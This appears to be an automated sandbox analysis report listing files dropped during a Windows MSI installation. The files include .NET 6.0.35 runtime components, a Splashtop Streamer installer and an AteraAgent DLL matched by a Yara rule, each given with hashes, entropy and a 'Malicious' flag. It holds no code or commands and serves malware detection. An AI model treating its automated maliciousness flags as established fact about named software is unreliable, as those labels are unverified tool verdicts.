                                                                                                                                                                                                                                                                                                                                  SHA-512:33ACF0BDBD1F33526D348A47BC00963843FC72EB203DF07D0136110109C892FB20AA9D3147204F958B95D750F7F98EB5DF3C387ED4B8802B7F929F201B41E90F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):84904
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.644708577111245
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:efsMvnDNlt3Hss+bEQjDhvBfHkuMfw9HcISmiWessgt7S2tsMv2XsP4G3IJ7k3Nw:EsMvnHN+bx3IW3u
                                                                                                                                                                                                                                                                                                                                  MD5:326FAC1B2AB33C0999FA3C2AB0C8632C
                                                                                                                                                                                                                                                                                                                                  SHA1:8F7A20FCF0D49187EF2531219D8B73B1F73021B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:53206129270B378E3EE0ECA436BE23E5AFCAC949E02752C2724D63E17A422948
                                                                                                                                                                                                                                                                                                                                  SHA-512:419B7BE68AC92FEA5CD4362EBEC997E981001566E471DB70CE01714038649887630FE0BF4C0EB34005226BA77382B529F953DDF3AAFD429222AED7275354757A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{C79F6EEC-3A2B-487D-A3B6-EDF4057B4E4B}%.Microsoft .NET Runtime - 6.0.35 (x64)!.dotnet-runtime-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{76657AF8-AF4E-4FA9-9A39-80AC267D9B11}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{BCDE6883-BAB7-54AB-B504-D8C3F75FDB2A}S.02:\Software\Classes\Installer\Dependencies\dotnet_runtime_48.140.21458_x64\Version.@.......@.....@.....@......&.{F621578B-E081-5FC4-B0C5-A151B816DC51}D.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.version.@.......@.....@.....@......&.{B0658A77-9697-57AB-AEF0-C49F5788A264}^.C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dll.@.......@.....@.....@......&.{120A93F0-81ED-50CA-84
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2805
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.772666941498026
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:KLgodt08v2Oh0giUHMb6P3q2Ym1kPjD8SuhJB4yKeU1DPDnPZDZk3EVltibVq:KLgodtfO40YHP2YO9YJCZe6bDPZDZk3g
                                                                                                                                                                                                                                                                                                                                  MD5:BD27F8767C98DB8ECCE39A9BFB4F774F
                                                                                                                                                                                                                                                                                                                                  SHA1:B1A893973750BAC4168F12ED36090257EFC213B5
                                                                                                                                                                                                                                                                                                                                  SHA-256:7B6163293035358FB54979A95745FCDAFFF9599D73ADF592E3418D90BEAD0A7A
                                                                                                                                                                                                                                                                                                                                  SHA-512:9941E1E5DE7C5A3D13CF9659ED2B4CF39156CFB430BEFAC9BC459B172AF59EC621C870B45241C80885CDA53781633AC22246187984B80CFC073F7ECEB0FB3A84
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{E91F8AC1-4917-455E-AACA-B40B193C7A62}..Microsoft .NET Host FX Resolver - 6.0.35 (x64)!.dotnet-hostfxr-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{4E46258D-E612-40D6-A98B-8F64771E3561}.....@.....@.....@.....@.......@.....@.....@.......@......Microsoft .NET Host FX Resolver - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{E3262256-B959-50C5-91BD-D2C1656236F1}W.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_HostFxr_48.140.21458_x64\Version.@.......@.....@.....@......&.{B59DD035-01D3-57CD-A06D-224838439FEA}3.C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dll.@.......@.....@.....@......&.{8EC524B8-7864-5ACE-B320-2D36216EBC12}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\hostfxr\Version.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Dir
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7220076108176
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:JLmgjdqJLaU3gtEVPQHLxglmt3tFbSuce6ItDDkrQEPbdBZ:V3qEUweUesJLSuce6pkWbF
                                                                                                                                                                                                                                                                                                                                  MD5:E6E28ADC5F7DD3BC97C59097CBDC7889
                                                                                                                                                                                                                                                                                                                                  SHA1:220C66CED5904CB88F866C86C320F806ADD98425
                                                                                                                                                                                                                                                                                                                                  SHA-256:992F950BBF01C5F301B4A7290B1447C8A3F684B0EED199638E927F7597C5FACE
                                                                                                                                                                                                                                                                                                                                  SHA-512:70EE5BE4D86E3AA5E898160144018EB545A2E46677F077D4B678A9AAB59C6160F3DEC217AC02F264B6EC1D7E1786E4DFB3493A4DC4C35B96F86D8195BE58AD41
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{C59601A1-771B-426B-A9F7-6CACCAC4DB4E}".Microsoft .NET Host - 6.0.35 (x64)..dotnet-host-6.0.35-win-x64.msi.@.....@.S.0.@.....@........&.{C44636B0-CF91-423F-8EBB-E5C6C9CC18A4}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.35 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}X.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_SharedHost_48.3.31210_x64\Version.@.......@.....@.....@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}".C:\Program Files\dotnet\dotnet.exe.@.......@.....@.....@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}B.22:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\sharedhost\Version.@.......@.....@.....@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                  Size (bytes):250736
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                                                                                                                  MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                                                                                                                  SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                                                                                                                  SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):182768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.29474871459677
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:M3hCcV2YVWR8xSSIqeCjEIz+hZvgvE5Q+yq8MPdJ0xH:ErTz9Pj/Ag/+XPw
                                                                                                                                                                                                                                                                                                                                  MD5:9ED1749276D20BE78D5E7A30D658C484
                                                                                                                                                                                                                                                                                                                                  SHA1:EAAEA2656A63366A888955CE030E091FEA70F0F6
                                                                                                                                                                                                                                                                                                                                  SHA-256:61F398C652504FEE07AF12AC50D4A70ECFF641234A4EDA59C68EC937B6D80C96
                                                                                                                                                                                                                                                                                                                                  SHA-512:33ACF0BDBD1F33526D348A47BC00963843FC72EB203DF07D0136110109C892FB20AA9D3147204F958B95D750F7F98EB5DF3C387ED4B8802B7F929F201B41E90F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):171064
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.093983981233022
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:jq44uv69SIrScxe0IZNJ+x+uk+hZPDFNkXAO4VR:jfn2Slcxe0Fc9CcQO2
                                                                                                                                                                                                                                                                                                                                  MD5:E80F90724939D4F85FC49DE2460B94B5
                                                                                                                                                                                                                                                                                                                                  SHA1:512EA4DEBA1C97CC7EC394BCE0E4A32CD497176E
                                                                                                                                                                                                                                                                                                                                  SHA-256:8041D3CCBAFA491D35F70030C3AFEBA683B0235BED24F242878D04C7E87B8687
                                                                                                                                                                                                                                                                                                                                  SHA-512:9494F1CD058DC3923E4F562D8ED2EDF3D252F519EFC6DB4F1B5289D8A1B841A6CB927E14D33DAB98E0BD4D22A5A473B8CD9424F77213527FBE0C183126356767
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):563561
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.78435931628703
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gwri7f8m8end5Xy+1kvI8k9W91iVXuXskIhR:gLh8edk+1kv5K+WhR
                                                                                                                                                                                                                                                                                                                                  MD5:448874D53345163862B7375682F6C110
                                                                                                                                                                                                                                                                                                                                  SHA1:D3F3BDE921FEB88A426D8504385F5959F072EB02
                                                                                                                                                                                                                                                                                                                                  SHA-256:4C29D7D9879B7F115CCFC14C2FE254E7149B58F4C0F7E07EC84DF71DFF21742A
                                                                                                                                                                                                                                                                                                                                  SHA-512:2FC48B3E6D03F4BA12FE78317BCB3F85720FC0B4A280390741F10E6F2569515D8D0002E310F32431BA9CB12548AB8F12B170BB02CC2B9984639A9A67AED8E180
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@..^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{3D8827C3-3F73-4AD7-9420-7CA93653C8F2}2.C:\Program Files (x86)\Splashtop\Splashtop Remote\.@.......@.....@.....@......&.{61B538AB-B209-C01B-F95C-B0A0531054D2}M.C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Acknowledgements.htm.@.......@.....@.....@......&.{3742F778-8BAC-9729-A5BE-712DA9BEB95A}@.C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\.@.......@.....@.....@......&.{ADBB7064-411F-E593-D901-EACB3BA8154E}Z.C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\install_dr
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                                                                                                                  SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                                                                                                                  MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                                                                                                                  SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1538
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                                                                                                                  MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                                                                                                                  SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):184240
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                                                                                                                  MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                                                                                                                  SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                                                                                                                  SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):521954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                                                                                                                  MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                                                                                                                  SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                                                                                                                  SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
